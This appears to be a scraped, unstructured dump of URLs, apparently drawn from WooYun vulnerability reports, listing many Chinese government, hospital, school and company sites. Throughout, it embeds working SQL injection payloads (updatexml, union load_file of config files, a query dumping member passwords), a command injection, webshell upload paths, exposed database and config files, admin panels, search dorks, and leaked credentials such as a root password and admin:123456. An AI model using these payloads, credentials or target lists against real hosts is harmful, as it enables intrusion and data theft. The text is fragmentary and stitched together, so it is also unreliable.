http://www.xggxq.gov.cn/about.asp?classID=1 http://www.shuozhousafety.gov.cn/index.php?p=danyeshow&lanmu=3 http://www.jlswb.gov.cn/zf11_news2.asp?id=23 http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=6279 http://www.kmhywj.com/city_index.aspx?city=chengdu http://zwgk.cangzhou.gov.cn/article5.jsp?infoId=309094 http://www.shiyuanhuahui.com/cen_view.asp?id=422 http://www.yiwuwangluogongsi.com/disc.asp?id=1212 http://www.wlcd.gov.cn/cn/wz.asp?id=910 http://www.666kjbg.com/ShowNewView.asp?actionid=458 http://www.fangxu.net/news_view.asp?id=64 http://www.chinamagic.com/NewProductShow.asp?ID=317 http://www.laizhoupiju.com/info.asp?id=1 http://06jun.com/Products.asp?id=566 http://dgnz.dg.gov.cn/2012/shenzhen/jianghua.asp?id=1 http://www.dltjc.com/info.asp?id=1 http://www.phjk.net/huifu1.asp?id=760 http://www.wawl.gov.cn/nzcms_list_news.asp?id=590&sort_id=586 http://www.sxsjttygj.gov.cn/news_zw.asp?id=12755&classid=12&ygj=red http://www.lylsj.gov.cn/root/hyfc/ShowContent.asp?id=1255 http://www.cqwzjyxx.com/view.asp?id=296&sy=0003 http://aucma.cn/index.php?act=ls&i=6 http://www.qlcybz.com/d.asp?type=d&type2=%E5%85%AC%E5%8F%B8%E7%AE%80%E4%BB%8B http://www.qbjngo.gov.cn/content.asp?id=5 http://tjj.ninghai.gov.cn/newsview.asp?id=1067&nodecode=00020001 http://www.hl.jcy.gov.cn/medialiebiao.aspx?ID=34&mc=%e5%9b%bd%e5%ae%b6%e7%ba%a7%e5%aa%92%e4%bd%93 http://www.kunshan.travel/ks/zw/news.jsp?newsid=923&categories=5&subCategories=16&linkage=0 http://www.zhonghedianqi.com/case.asp?sid=15&id=40 http://www.labourlawyer.cn/Service.aspx?id=1 http://www.bjgx.gov.cn/job/view.php?action=company&info=frpkqqxg http://www.emmet.cn/ProductCenter/BrandCenter.aspx?bcode=EMMET http://www.tde.cn/topic/blue/index.php?ty=44 http://www.yuyongwang.net/product.jsp?bid=2 http://0431touch.com/shownews.php?id=6 http://www.ycmsbyq.com/cp.asp?classid=71 http://www.3gbaojingqi.com/gywm.asp?id=11 http://xkyl8686.com/kwd.php?id=648/ http://www.hongmutv.com/Videolist.aspx?id=2013 
http://www.jsthsly.com/NewsShow.asp?id=284 http://www.szftec.gov.cn/newslist.asp?anclassid=1 http://www.wsbedu.com/chu/hua/huas3.asp?w http://iconf.bbn.com.cn http://113.5.255.119:3380/inms_3.0/login.do http://113.5.255.119:3380/jmx-console/ http://113.5.255.119:3380/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL http://113.5.255.119:4380/DNReport/system/login!login.do http://www.hnroger.com/system2/login.action http://www.jndaxxw.gov.cn/ http://www.jndaxxw.gov.cn/dangan/admin/adminlogin.asp?logout=ture http://www.jndaxxw.gov.cn/dangan/admin/admin.asp http://220.163.43.25/vwss/desktop/wssextdesktop.jsp http://220.163.43.25/vwss/desktop/wssextdesktop.jsp http://www.lppz.com/OurHome/modules/core/login.jsp http://www.evecom.net/ http://www.fzhb.gov.cn/admin/content/upload.jsp http://www.fjjsw.gov.cn/admin/content/upload.jsp http://www.fjjsw.gov.cn:8080/admin/content/upload.jsp http://www.fjsf.gov.cn:11080/fjsf/admin/content/upload.jsp http://www.fjsf.gov.cn/fjsf/admin/content/upload.jsp http://www.fjsf.gov.cn/admin/content/upload.jsp http://www.fjcoop.com:8088/admin/content/upload.jsp http://www.fjcp.com/admin/content/upload.jsp http://www.evecom.net/admin/content/upload.jsp http://*./admin/template/uploadFile.jsp http://halougo.com/halougo.com.zip http://www.elongtian.com/kehuanli/ http://ir.vancl.com/ http://zone.wooyun.org/content/5429 http://zone.wooyun.org/content/1284 http://202.111.167.54/ http://www.zswsj.gov.cn:8080/system/FunPages/DownloadFile.jsp?filePath=/system/FunPages/DownloadFile.jsp&name=DownloadFile.jsp http://www.angke.com.cn/ http://demo.angke.com.cn/ http://www.osa.com.cn/osa.zip http://bbs.hnticai.com/static/image/common/logo_hn.png/.php http://bbs.cpdyj.com/static/image/common/logo_hn.png/.php http://bbs.starlott.com/static/image/common/logo_hn.png/.php http://www.jlsi.gov.cn http://usercenter.12308.com/passenger/listPage.html USER:root PASSWORD:asdfqwer 
http://usercenter.12308.com/resetPwd/resetPwdByMobilePage.html http://60.161.215.7:8888/main.aspx http://hbmt.hisense.com/cn/product.aspx?ClassID=z8UwZwanMEg%3D&Encap=-1 http://xsxw.hee.cn/zhunkaozheng.aspx?bmbh=13142000036 http://rg.noi.cn/ http://www.ksepb.gov.cn/kshbmh/pages/ksepb/HjxfsqdXxList.jsp?xfbh= http://12345.sihong.gov.cn/sh12345web/ywxxtemplate/wywzlist.aspx?OUGuid= http://chezhan.12308.com/baicheng-18469.html http://www1.deyang.gov.cn//dygjj/sou.aspx?guanjz= www.lxjx.cn inurl:licenseLink.do?method= http://www.hztcm.net/service_expert_serch.php?cid=88&keywor http://bugzilla.huawei.com/CVS/Entries http://www.csc.edu.cn http://202.85.208.234:8088 http://www.wooyun.org/whitehats/%E7%98%A6%E8%9B%9F%E8%88%9E)提交的漏洞。 inurl:7001/defaultroot http://www.ahjinzhai.gov.cn:7001/defaultroot/upload/information/2014103011135554941375673.jsp http://58.20.50.94:7001/defaultroot/upload/information/2014103017374132828399603.jsp http://218.22.212.148:7001/defaultroot/upload/information/2014103019333478480357773.jsp http://222.178.221.54:7001/defaultroot/upload/information/2014103019095309431976265.jsp http://oa.hongdou.com:7001/defaultroot/upload/information/2014103019214550025117683.jsp http://www.bengbu.gov.cn:7001/defaultroot/upload/information/2014103111045738020322036.jsp http://220.179.251.131:7001/defaultroot/upload/information/2014103116063901683581994.jsp http://211.141.165.226:7001/defaultroot/upload/information/2014103116155469073216513.jsp http://oa.yundagroup.com:7001/defaultroot/upload/information/2014103116271633750509356.jsp http://211.144.121.189:7001/defaultroot/upload/information/2014103116445923450268822.jsp http://usercenter.12308.com http://218.69.100.146:8082/citywater/login/action/login!login.action http://58.63.253.21:8080/ http://58.63.253.7:8080/ http://lol.laoyuegou.com/hero/win/country/0/server/0/type/1/focus/ban/position/%28updatexml%281,concat%280x5e24,%28select%20system_user%28%29%29,0x5e24%29,1%29%29%20and%200=/time/7.html 
http://www.wx2h.com/web/zhb_tg_detail.php?id=355 http://wdcx.yundasys.com:81/yd_wd/ inurl:hotelvouchergta.asp?orderid= http://211.137.32.194/index.html http://202.96.103.54/index.html http://14.17.100.56:8001/Login.aspx http://www.qdzjj.gov.cn/download.php?path=download.php http://www.tiens.com/manage/后台直接弱口令。admin http://www.hzzglxs.com/ http://www.meiduly.cn http://www.qzflly.com http://www.mzl66.com/ http://www.ywsdlxs.com http://www.anjitour.cn/ http://www.zjlyjp.com http://www.hzkyly.com/ http://www.hangzhou-travel.com.cn http://www.hzqst.com/ http://www.cnjct.com/ http://www.0570u.com http://www.klx365.com/ http://www.hdts.cn/ http://www.ykly.com.cn http://www.xiao6.cn http://www.lxtxcn.com http://www.0738u.com http://tour.hnfggl.com http://www.fangzhoutour.com http://www.huaxiats.net http://www.feifanly.com/ http://www.86778011.com http://www.hylxs.com.cn/ http://www.jhdt.cn http://www.razl0577.com/ http://www.zgjqzj.com/ http://tour.lantuw.com http://www.mlzjr.com http://www.yycq.net/ http://www.83188678.com http://tour.tzyouhao.com http://www.88811555.com.cn http://www.zjjsbf.com http://www.zhongqiaolvyou.com http://www.98333.com.cn http://www.zjyxgl.com http://www.nxwh.net/ http://xxxx//sys/treeXml.jsp?Si06=1&type=sort ID:www.wooyun.org/bugs/wooyun-2014-075853 3.test.ssap.com.cn/admin/CEC_Login.htm www.babytree.com http://121.207.243.132:8001/web/login http://cc.yundasys.com:8080/cassets/main.jsp佳克实物资产全生命周期的数据分析管理软件 inurl:cmpPlay.aspx?movieID http://tz9158.com/5/cmpPlay.aspx?movieID=1fe67b6f-41f8-407c-891a-8efdc6 http://www.sqlmap.org http://host/cmis40/photo/PictureFOS.a?pid= http://j.scedu.com.cn/list_v.php?sid=01 http://www.dyk.com.cn/promotion/index?type=89 
http://www.7jia2.com/index.php?app=search&cate_id=9235&spec_2=8%20and%201%20=%202%20union%20all%20SELECT%201,hex%28load_file%28char%2847,97,108,105,100,97,116,97,47,119,119,119,47,119,119,119,114,111,111,116,47,115,112,116,109,97,108,108,47,100,97,116,97,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112%29%29%29,3,4,5,6,7%20FROM%20lym_ext_spec%20es http://119.167.223.86:6688/Webstate/WebSquery/search0s.asp?pid=0&did=s URL:http://www.dyk.com.cn/search?q=K3&t=1 http://219.142.55.69:8080/400sys/index.jsp http://cba.gov.cn/cbastats/media/wcbateam.aspx?startshift=1&teamno=WTe001&endshift=1 http://www.hs-express.cn/OldZzfw.aspx?BillNo=s http://www.jiaji.com/ac01.aspx?id=1 http://www.joust.net.cn/searchNo.aspx?NO=s http://www.lark.gov.cn/System/sys0_inc_voteresult.asp?VoteID=3 http://deshi.ougz.com.cn/skills/login.do?portalId=A&siteKey=0 http://218.5.64.214:8090/Entrance/ShipPackApp.aspx http://m.wanhui.cn/index-w1000292/ https://passport.wanhui.cn/m/account/forgetpassword/step1/?redirect=http%3A%2F%2Fm.wanhui.cn%2Fmine%2F%3Fwpid%3D1000292&wpid=1000292 http://movie.js118114.com:80/Movie/Ticket_Compare.aspx?&fid=001101332014&pid=10wml http://bianlun.7k7k.com/comment.php?action=GetContent&site=pk&aid=NSFTW'&type=1&order=1&num=10&sn=3&tid=1&t=1414811274819 http://218.22.39.88:8081/yzmisfw/csoft/login.action http://www.ctis.cn/lwlk/user/userLogin.action http://www.haitiansoft.com:8080/ http://211.139.80.193/ http://211.139.80.194:8080/bmdp/ http://222.187.199.60/bjxsxx.asp http://jwxt.tzpc.edu.cn/bjxsxx.asp http://jwgl.jhu.cn/bjxsxx.asp http://jwc.jljtxy.com.cn/bjxsxx.asp http://jwcx.czie.net/bjxsxx.asp http://180.209.64.10/bjxsxx.asp http://szitu.cn:86/bjxsxx.asp http://bugreport.autohome.com.cn/ http://bugreport.autohome.com.cn/nagios/ http://bugreport.autohome.com.cn/nagiosql/ http://www.tzsw.cn/ http://www.tzsw.cn/wzjs.aspx?newstypeid=25,选择医院 http://www.sxdqyy.com/ http://www.sxdqyy.com/Admin/Index.aspx http://www.tz2y.cn/Admin/Index.aspx 
http://www.tzmh.com/Admin/Index.aspx http://www.wlsph.com/Admin/Index.aspx http://www.ls-hospital.com/Admin/Index.aspx http://www.312000.net/Admin/Index.aspx http://www.2113515.com.cn/Admin/Index.aspx http://www.sxdqyy.com/Admin/Index.aspx http://www.dywsyy.com/Admin/Index.aspx http://www.pjyy.cn/Admin/Index.aspx http://www.qzhospital.com/Admin/Index.aspx http://www.tzlqey.com/Admin/Index.aspx http://www.lhzyy.com/Admin/Index.aspx http://www.lhsfby.com/Admin/Index.aspx http://www.wlzyy.com/Admin/Index.aspx http://www.wlfby.com/Admin/Index.aspx http://www.wldfyy.com/Admin/Index.aspx http://www.yh2y.com/Admin/Index.aspx http://www.yhrmyy.cn/Admin/Index.aspx http://www.yhzyy.com.cn/Admin/Index.aspx http://www.zjsmyy.com/Admin/Index.aspx http://www.ttrmyy.com/Admin/Index.aspx http://www.xjrmyy.com.cn/Admin/Index.aspx http://www.xjfby.cn/Admin/Index.aspx http://www.tzzsgsyy.com/Admin/Index.aspx http://www.hy3y.com/Admin/Index.aspx http://www.wlyy.cn:8000/Admin/Index.aspx www.xxoo.com http://www.xxoo.com http://passport.8684.com/8684/ajax.php?cmd=get_city http://glz.dgpt.edu.cn/user/reg.asp http://glz.dgpt.edu.cn/admin/ http://glz.dgpt.edu.cn/admin/TempletEdit.asp?Action=Add&Dir=/templets http://glz.dgpt.edu.cn/templets/Untitled.asp;.html http://at.db.766.com/ http://at.db.766.com/search.php?wp=16 https://account.chsi.com.cn/account/preregister.action?from=chsi-home http://www.haitiansoft.com:8080/ http://oa.tjfsu.edu.cn/losepassword.asp http://vos.tjufe.edu.cn/losepassword.asp http://www.shhjwl.com/vos/losepassword.asp http://www.cnshuiyu.com/losepassword.asp http://www.fzsyxx.com/oa/losepassword.asp http://211.68.250.42/losepassword.asp http://211.68.192.21/losepassword.asp http://121.30.226.44/losepassword.asp http://116.228.82.237/losepassword.asp http://180.166.7.94/losepassword.asp http://211.68.250.42/losepassword.asp http://180.166.7.94/losepassword.asp http://116.228.82.237/losepassword.asp http://121.30.226.44/losepassword.asp 
http://cose-sz.seu.edu.cn/它的后台网址是http://cose-sz.seu.edu.cn/admin/manager/Com_index.action http://www.cometbbs.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28username,0x27,password%29%20from%20cdb_members%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://www.wooyun.org/bugs/wooyun-2014-081643/trace/4396818394b9b59fdfdd9a1da75a1883 http://mail.12333sb.com/ http://mail.12333sb.com/login.php1 http://210.75.222.58:8080/ http://210.75.222.58:8080/foot.jsp http://www.cmce.zju.edu.cn/这个站用的是Discuz http://www.cmee.zju.edu.cn/utility/convert/data/config.inc.php http://60.161.215.7:8888/Login.aspx http://www.001studio.com/ http://www.caifujiu.com/admin/ http://www.manqiulatex.com/admin/ http://www.bjzhunxing.com/admin/ http://www.hzjinwei.com/admin/ http://www.mic-deutschland.de/admin/ http://www.001studio.com/case.html http://fjportal.vcomlive.com/ http://fjportal.vcomlive.com/play/play.php?id=LBQG1120572 http://www.hcwsxx.gov.cn/voteaaa/Admin/Index.asp http://www.enet.com.cn/elady/star/inforcenter/star.jsp http://www.jeanswest.com/imgview2.asp http://news.07073.com/zixun/1.txt https://github.com/acailiu/walrus/blob/b8a527cb9d0f0a66a6cdbe69d15469a063df44ed/walrus/pylib/pymail.py https://mm.tencent.com https://github.com/andyylzhang/work_proj/blob/fa573eb17eb1131a982a0ded5d54f7ced7ee48f1/py_sendmail/sendmail_with_tables.py https://mm.tencent.com https://github.com/acailiu/walrus/blob/b8a527cb9d0f0a66a6cdbe69d15469a063df44ed/walrus/pylib/pymail.py https://mm.tencent.com http://indunet.net.cn/technology/data!tech.action?gotourl=/technology/techlist.jsp&itype=1 http:/m.yy.com/ http://zzcx.scujjedu.cn:114 cn:114 http://zzcx.scujjedu.cn:114 http://fish.unilbs.com/ShipUserManager/UserLogin.aspx http://219.142.87.93/ 
http://www.spacechina.com/ VERSION:1.2.3 http://www.kuaikuai.cn/ http://www.wandaperformance.com/ http://www.wandaperformance.com/user.do?parameter=password http://60.10.8.78/ http://www.bzfcj.gov.cn:9081/Templets/BoZhou/aspx/buildctrl.aspx?buildcode=129583011811069 http://www.ahbzfdc.com/Templets/BoZhou/aspx/buildctrl.aspx?buildcode=12402842741001 http://www.hcsfcglj.com/Templets/BoZhou/aspx/buildctrl.aspx?BuildCode=13715232691001 http://www.mcfcj.cn/Templets/BoZhou/aspx/buildctrl.aspx?buildcode=13137180041051 http://www.zyfcj.com/Templets/BoZhou/outside/buildctrl.aspx?BuildCode=ZY14020087418 http://www.bzfcj.gov.cn:9081/Templets/BoZhou/aspx/roomdetail.aspx?roomcode=13794713971468 http://www.hcsfcglj.com/Templets/BoZhou/aspx/roomdetail.aspx?roomcode=13805055391010 http://www.mcfcj.cn/Templ http://zyfcj.com/Templets/BoZhou/aspx/roomdetail.aspx?roomcode=091d9563-b83b-45f6-bfbf-f6f63c8e1237 http://www.lxfgj.com/Templets/BoZhou/aspx/roomdetail.aspx?roomcode=14M6YsFXu0Y= http://work.hebei.com.cn:9001/pub/services/NbCmsServer?wsdl http://www.yichemall.com/Order/Detail?orderId=1 google:https://www.sssis.com/search?newwindow=1&safe=active&biw=1440&bih=711&q=site%3Aelong.com+inurl%3A博彩&oq=site%3Aelong.com+inurl%3A博彩&gs_l=serp.3...2917.6630.0.6693.4.4.0.0.0.0.172.515.0j3.3.0.msedrc...0...1c.1j4.57.serp..4.0.0.UESks6CvLC4 http://user.nipic.com/memberinfo/password http://**.**.**.**/article/listAll.php?cid=6 inurl:zcfg_read.asp?id= http://www.yichemall.com/ http://www.yichemall.com/User/ForgotPassword http://officemsg.focus.cn www.gxi.gov.cn http://cyxmk.hbjyj.gov.cn/details.php?id=86 http://dwzwgk.shitai.gov.cn/include/web_content.php?id=1901 http://dyzzf.gov.cn/member/info_news.php?fid=1291淮北市段园镇人民政府网站 http://english.qqhr.gov.cn/xinwen.php?id=210 http://fs.aqcz.gov.cn/show.php?id=205 http://v5op.apk.gfan.com/index.action 
server:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/amd64:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib http://java.sun.com/ http://51auto.mop.com/hclist_/ http://lianhua.xmedu.cn/Login!singleSysChkLogin.do http://www.xmhmxx.com/Login!singleSysChkLogin.do http://27.154.224.94:6060/Login!singleSysChkLogin.do http://218.5.65.158/Login!singleSysChkLogin.do http://www.net137.cn/product.asp http://www.twsgg.com/feedback.asp http://www.czhsbwg.com/guest.asp http://www.czwjjp.com/baoming.asp http://www.elmhome.com/guest.asp http://www.czzzhyxh.com/feedback.asp http://www.ai-machi.com/ckfinder/ckfinder.html http://www.ai-machi.com/upload/files/1.asp/2014112154426.jpg http://www.czqjcc.com/ckfinder/ckfinder.html http://www.czqjcc.com/upload/files/1.asp/2014112163059.jpg http://www.elmhome.com/ckfinder/ckfinder.html http://www.elmhome.com/upload/files/1.asp/2014112163918.jpg http://www.mmission.cn/ckfinder/ckfinder.html http://www.mmission.cn/upload/files/1.asp/201411215460.jpg php:138 php:138 http://www.wooyun.org/bugs/wooyun-2014-081663/trace/1b8eeea3b409c968cea424fa0c26d2db http://www.wooyun.org/bugs/wooyun-2014-081643/trace/4396818394b9b59fdfdd9a1da75a1883 http://www.tzyuanlin.com/admin/database/HDEWeb.mdb http://www.tztengrong.com/admin/database/HDEWeb.mdb http://www.xinhulaw.com/admin/database/HDEWeb.mdb http://www.tzyiming.com/admin/database/HDEWeb.mdb http://www.tzyuanlin.com/admin/ http://www.tzzy.gov.cn/admin/ http://tzjz.com.cn/admin/ http://www.wooyun.org/bugs/wooyun-2014-081663/trace/1b8eeea3b409c968cea424fa0c26d2db http://networkbuilders.intel.com/endusers/index.php?option=com_spfiles&task=shortingData http://www.bitcar.com http://dsa.bitcar.com/fckeditor/ http://dsa.bitcar.com/pink.aspx http://www.bitcar.com/pink.txt http://fm.zju.edu.cn/。该网站是浙江大学计算机学院本科生教学用的一个网站,里面包含了几十门计算机专业课程的资料和学生信息,同时该网站也是一个在线教学平台,学生可以提交作业,老师可以批改,注册学生人数超过5000。由于用户名就是学生的学号,此漏洞极易被利用进行一些撞库攻击。 http://fm.zju.edu.cn/editProfile.php 
line-height:30px padding-top:10px http://59.151.102.53/ http://59.151.102.53:8080 http://59.151.102.53/i.bitauto.com/20120131/ http://xxxx/opac/recommend/recommendBookList/list http://net-training.chinasarft.gov.cn/ http://net-training.chinasarft.gov.cn/jsp/sites/site?action=messagelist&pageaction=query&type=15000 http://shop.taikang.com/rockmongo/index.php http://wooyun.org/bugs/wooyun-2014-076483 http://wooyun.org/bugs/wooyun-2014-076480 http://mail.chinaexpressair.com http://yy.tv/ http://yy.tv/index.php?m=Video&do=gameProfileList&gid=7 http://14.17.109.4:8002/ http://14.17.109.44/ganglia/ http://14.17.108.40:8080/ http://183.60.218.160:8080/index.html http://www.gtggjy.com/TSPB/NewsManager/NewsAttFileDownload.do?fileGuid=20D5FBB324C6B1C07D31ACD808398A9D http://www.qfztb.gov.cn/TSPB/NewsManager/NewsAttFileDownload.do?fileGuid=91091DB0617ABC565E1218BDC6103337 http://www.zjhnztb.com/TSPB/NewsManager/NewsAttFileDownload.do?fileGuid=6816F8EBEB828E332009E7A19981B0B5 http://www.jszbw.com/TSPB/NewsManager/NewsAttFileDownload.do?fileGuid=D7E9393FD55D8720697B5B960F6ED3B2 http://www.smztb.com.cn/TSPB/NewsManager/NewsAttFileDownload.do?fileGuid=4E343211AA26FFE27D4916381ABD9DA7 http://www.jsspzx.gov.cn/JsWeb/NewsManager/NewsAttFileDownload.do?fileGuid=BBFD40FDC9AA23B9125271AF56C2FBA8 http://www.jxedzsp.gov.cn/jxkfqglxt/NewsManager/NewsAttFileDownload.do?fileGuid=E9EB9C8E042A5A68F71E6E86868D06AD http://122.226.154.126/TSPB/NewsManager/NewsAttFileDownload.do?fileGuid=DA7C22A193C779CE73C1DCCD67ED76D8 http://www.wecrm.com/ http://www.wecrm.com/static/consumer/ http://www.baidu.com/s?wd=%E5%8D%8E%E6%80%9D%E9%80%9A%E7%BD%91%E7%BB%9C%E4%BC%9A%E8%AE%AE&pn=0&oq=%E5%8D%8E%E6%80%9D%E9%80%9A%E7%BD%91%E7%BB%9C%E4%BC%9A%E8%AE%AE&tn=baiduhome_pg&ie=utf-8&rsv_idx=2&rsv_spt=1&issp=1&f=8&rsv_bp=0 http://meetinglive.teleuc.com/index.do?siteBrand=meetinglive http://bgifx.teleuc.com/index.do?siteBrand=meetinglive http://pop136.teleuc.com/index.do?siteBrand=meetinglive 
http://kuniyasu.teleuc.com/index.do?siteBrand=meetinglive http://jkec.teleuc.com/index.do?siteBrand=meetinglive http://dcmfx.teleuc.com/index.do?siteBrand=meetinglive http://pthl.teleuc.com/index.do?siteBrand=meetinglive http://cuconline.teleuc.com/index.do?siteBrand=meetinglive http://gzosta.teleuc.com/index.do?siteBrand=meetinglive http://semia.teleuc.com/index.do?siteBrand=meetinglive http://demo.74cms.com/jobs/jobs-list.php?sort=wage&page=1&jobcategory=&education=&citycategory=&experience=&settr=3&trade=&wage=&nature= http://law.szu.edu.cn/Works_Article.asp?ClassCode=00030007&ArticleID=2051 http://law.szu.edu.cn/Window.asp?ClassCode=00090001 http://law.szu.edu.cn/new.asp?ClassCode=00020001 http://api.ucar.cn/CarSourceInterface/ForJson/dealerCarSourceForJson.ashx?count=10&cityid=2530&callback=brand_callback&_=1343004348578&pids=10012 http://demo.74cms.com/train/train-curriculum-list.php?district=&category=&sdistrict=&classtype=&start=&refre=&sort=hot%3Edesc&key= http://demo.74cms.com/train/train-curriculum-list.php?district=&category=&sdistrict=&classtype=&start=&refre=&sort=hot%3Edesc%27&key= error:SELECT http://**.**.**/proc/woopasswd/index.phptype=des&do=decrypt&keyword=789%3Becho%20%22wooyun%20test%22 http://sqlmap.org http://www.dfem.com.cn//ddglts/admin_z/ http://www.dfem.com.cn//ddglts/uploadfile/201411030347334944.php;gif http://portuguese.dfem.com.cn/?p=admin https://software.intel.com/en-us/user/login http://gdtj.chinasarft.gov.cn/wszb/map/000000.aspx http://vip.kankan.com/sftp-config.json http://itcloud.bingocc.cc/ http://www.skynj.com/) inurl:homepages/content_page.aspx http://58.213.129.206:8080/jytweb/homepages/webusr_list_page.aspx http://58.222.184.133/tzxyweb/homepages/webusr_list_page.aspx http://qlgk.taizhou.gov.cn/tzptweb/homepages/webusr_list_page.aspx http://58.222.216.220/ggxygkweb/homepages/webusr_list_page.aspx http://58.222.202.135:82/homepages/webusr_list_page.aspx http://xygk.jingjiang.gov.cn/homepages/webusr_list_page.aspx 
http://58.222.212.114:82/txfgxyweb/homepages/webusr_list_page.aspx http://58.222.195.110:8081/jyxyweb/homepages/webusr_list_page.aspx http://58.222.212.114:82/txgtxyweb/homepages/webusr_list_page.aspx http://58.222.211.21/xhgtxyweb/homepages/webusr_list_page.aspx http://61.178.185.50/tzweb/homepages/webusr_list_page.aspx http://www.dtxzfw.com/homepages/webusr_list_page.aspx http://www.jseic.gov.cn:8081/jxwweb/homepages/webusr_list_page.aspx http://58.213.129.206:8080/jytweb/homepages/webusr_list_page.aspx http://58.222.184.133/tzxyweb/homepages/webusr_list_page.aspx http://qlgk.taizhou.gov.cn/tzptweb/homepages/webusr_list_page.aspx http://58.222.202.135:82/homepages/webusr_list_page.aspx http://58.222.216.220/ggxygkweb/homepages/webusr_list_page.aspx http://58.222.212.114:82/txgtxyweb/homepages/appinfo_list_page.aspx http://58.222.211.21/xhgtxyweb/homepages/appinfo_list_page.aspx http://58.222.195.110:8081/jyxyweb/homepages/appinfo_list_page.aspx http://www.dtxzfw.com/homepages/appinfo_list_page.aspx http://xygk.jingjiang.gov.cn/homepages/appinfo_list_page.aspx http://219.134.129.53/pantoschool/XT/Accounts/login2.aspx?ReturnUrl=%2fpantoschool%2f http://huodong.5sing.kugou.com/ http://yplsjg.smda.gov.cn/ http://117.27.230.221/ admin:123456,test:123456用户名密码 admin:123456登陆成功,以下是上传功能,可以上传shell进行内网测试(友情测试点到为止,我就不上传shell了) http://v.17173.com/live/网站的配置、修改域名、发布公告等等,具体功能如下 http://vip.gffunds.com.cn/projects http://vip.gffunds.com.cn/issues/32 http://ctags.cn/ http://ctags.cn/bi/ http://easyad.cig.com.cn/ http://easyad.cig.com.cn/sem/file/index?cid=71&customer=71 http://easyad.cig.com.cn/sem/file/index?cid=71&customer=71 http://easyad.cig.com.cn/sem/file/index?cid=71&customer=71 http://easyad.cig.com.cn/project/index http://easyad.cig.com.cn/index.php/project/index/detail?project=2740 http://wanxuem.jiaoyu.baidu.com/index.php/Home/Exchange/postsList/id/2131/type/2.html http://www.baidu.com/s?wd=区政府信息公开系统&pn=20&oq=区政府信息公开系统&ie=utf-8&rsv_page=1&f=8&rsv_bp=1&tn=baidu 
http://xinxigk.baodi.gov.cn/commonSearch.jsp?search=1 http://zfxxgk.bh.gov.cn/commonSearch.jsp?search=1 http://gk.tjnk.gov.cn/commonSearch.jsp?search=1 http://202.99.99.30/commonSearch.jsp?search=1 http://60.29.110.175/commonSearch.jsp?search=1 http://gk.xq.gov.cn/commonSearch.jsp?search=1 http://218.69.106.201:8080/commonSearch.jsp?search=1 http://gk.tjhqqzf.gov.cn/commonSearch.jsp?search=1 http://218.94.36.39:96/jstsh/jsp/xinxwh/user/queryMoreGongd.do?flag=1 www.taiheinfo.net http://dxks.ecupl.edu.cn/dxks/login.action http://58.68.237.38 jdbc:mysql://**.**.237.124:3306/a*****k http://211.95.193.67:80/ http://www.njude.com.cn/specls/cls/bbs/daoxue.asp?CourseID=09248A http://www.skynj.com/) inurl:homepages/content_page.aspx http://58.213.129.206:8080/jytweb/admin/sysconfig_reg_page.aspx http://58.222.184.133/tzxyweb/admin/sysconfig_reg_page.aspx http://qlgk.taizhou.gov.cn/tzptweb/admin/sysconfig_reg_page.aspx http://58.222.216.220/ggxygkweb/admin/sysconfig_reg_page.aspx http://58.222.202.135:82/admin/sysconfig_reg_page.aspx http://xygk.jingjiang.gov.cn/admin/sysconfig_reg_page.aspx http://58.222.212.114:82/txfgxyweb/admin/sysconfig_reg_page.aspx http://58.222.195.110:8081/jyxyweb/admin/sysconfig_reg_page.aspx http://58.222.212.114:82/txgtxyweb/admin/sysconfig_reg_page.aspx http://58.222.211.21/xhgtxyweb/admin/sysconfig_reg_page.aspx http://61.178.185.50/tzweb/admin/sysconfig_reg_page.aspx http://www.dtxzfw.com/admin/sysconfig_reg_page.aspx http://www.jseic.gov.cn:8081/jxwweb/admin/sysconfig_reg_page.aspx http://58.213.129.206:8080/jytweb/admin/sysconfig_reg_page.aspx http://58.222.184.133/tzxyweb/admin/sysconfig_reg_page.aspx http://qlgk.taizhou.gov.cn/tzptweb/admin/sysconfig_reg_page.aspx http://58.213.129.206:8080/jytweb/admin/effectdate_reg_page.aspx http://www.dtxzfw.com/admin/effectdate_reg_page.aspx http://www.jseic.gov.cn:8081/jxwweb/admin/effectdate_reg_page.aspx 
http://58.222.212.114:82/txfgxyweb/inc/frame.htm?url0=../developer_tools/webresource_list_left_page.aspx http://58.222.195.110:8081/jyxyweb/inc/frame.htm?url0=../developer_tools/webresource_list_left_page.aspx http://58.222.212.114:82/txgtxyweb/inc/frame.htm?url0=../developer_tools/webresource_list_left_page.aspx http://58.222.216.220/ggxygkweb/transdata/transdata_outtoin_page.aspx http://xygk.jingjiang.gov.cn/transdata/transdata_outtoin_page.aspx http://58.222.211.21/xhgtxyweb/transdata/transdata_intoout_page.aspx http://58.222.216.220/ggxygkweb/transdata/transdata_intoout_page.aspx http://xygk.jingjiang.gov.cn/admin/usr_page.aspx?q=%C2%97%C3%BF%C3%81%C2%AC%C3%9C%C3%A5%C2%82%C3%88%C2%98%C3%85%C2%9B%C2%98%C3%86 http://58.222.212.114:82/txfgxyweb/admin/usr_page.aspx?q=%C2%97%C3%BF%C3%81%C2%AC%C3%9C%C3%A5%C2%82%C3%88%C2%98%C3%85%C2%9B%C2%98%C3%86 http://58.222.216.220/ggxygkweb/inc/frame.htm?url0=../transdata/transtablesmapping_left_page.aspx http://58.222.184.133/tzxyweb/inc/frame.htm?url0=../transdata/transtablesmapping_left_page.aspx https://222.178.225.34/index.php http://58.22.191.175(无需登陆) http://hqwx.fjnu.edu.cn/Repair/system/login/login.php http://weixin.lenovo.com.cn/lenovo_admin_weixin/page/main.php http://weixin.lenovo.com.cn/valuation/index.php/EvaluationList/evaluation_list?username=1&page=0 http://weixin.lenovo.com.cn/valuation/index.php/Evaluat http://weixin.lenovo.com.cn/valuation/index.php/Evaluat http://www.motexiu.cn/a/2011missworld/picture.php?areaid=7 http://www.motexiu.cn/a/2011missworld/ http://sqlmap.org http://59.cn/icp/--- http://ispapi.dns-china.com:18080 